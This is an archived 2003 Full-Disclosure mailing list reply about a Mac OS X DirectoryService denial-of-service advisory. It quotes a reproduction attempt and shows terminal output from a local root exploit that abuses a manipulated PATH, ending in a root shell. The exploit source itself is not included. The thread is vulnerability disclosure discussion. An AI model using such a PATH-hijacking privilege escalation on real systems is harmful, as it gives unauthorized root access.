Re: [Full-Disclosure] OS X DirectoryService DoS {@stake adv:
From: Neeko Oni (neeko@haackey.com)
Date: 04/18/03
- Previous message: Muhammad Faisal Rauf Danka: "[Full-Disclosure] Fwd: CERT Advisory CA-2003-13 Multiple Vulnerabilities in Snort Preprocessors"
- In reply to: subversive : "Re: [Full-Disclosure] OS X DirectoryService DoS {@stake adv: a041003-1}"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: Neeko Oni <neeko@haackey.com> To: full-disclosure@lists.netsys.com Date: Thu, 17 Apr 2003 22:15:35 -0700 (PDT)
Hoping to encourage people to figure out what @stake was talking about
in regards to the OS X DirectoryService DoS, I've attached a local
exploit for DirectoryService _once is has been crashed/killed_.
[sera:~] loser% gcc osxds.c -o touch
[sera:~] loser% ./touch
Original path: /bin:/sbin:/usr/bin:/usr/sbin
New path: .
Executing DirectoryService with false PATH...
Forked DirectoryService, pausing before shell exec...
sh: rm: command not found
Cross your fingers.
Path restored: /bin:/sbin:/usr/bin:/usr/sbin
euid is root.
root:~# id
uid=0(root) gid=20(staff) groups=20(staff)
root:~#
>
> Neeko Oni wrote:
>
> >Ok, the PATH problem is self-explanatory (and has been exploited once
> the DirectoryService process has crashed) but I've had some difficulty
> >reproducing the DoS attack claim. I've got a 10.2.4 machine sitting
> >right next to me, I believe it's a stock install, but DirectoryService
> >doesn't bind 625. DirectoryService doesn't bind any ports and
> >furthermore nothing binds 625 at all.
> >
> >Has anyone reproduced the DoS in that advisory?
>
> I also read the advisory and of the two MacOS machines that I am able
> to access (only one locally) I can confirm that on the machine that
> I don't have local access there was a daemon running on port 625 and
> as the advisory states I was able to reproduce the DoS attack. I'm
> not sure exactly which version of MacOS X that machine was running
> but the daemon did crash and and refuse connection.
>
> On the machine that I know for a fact is 10.2.4 and have local access to,
> DirectoryService was setuid root and was running but there was no port
> 625 open. I haven't port scanned the machine to check other ports yet
> so i'm not ruling out the possibility its running on a different port
> just yet.
>
> Has anyone else looked into this matter... ?
>
> -subversive
> --
> ______________________________________________
> http://www.linuxmail.org/
> Now with e-mail forwarding for only US$5.95/yr
>
> Powered by Outblaze
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- text/plain attachment: C program text
- Previous message: Muhammad Faisal Rauf Danka: "[Full-Disclosure] Fwd: CERT Advisory CA-2003-13 Multiple Vulnerabilities in Snort Preprocessors"
- In reply to: subversive : "Re: [Full-Disclosure] OS X DirectoryService DoS {@stake adv: a041003-1}"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
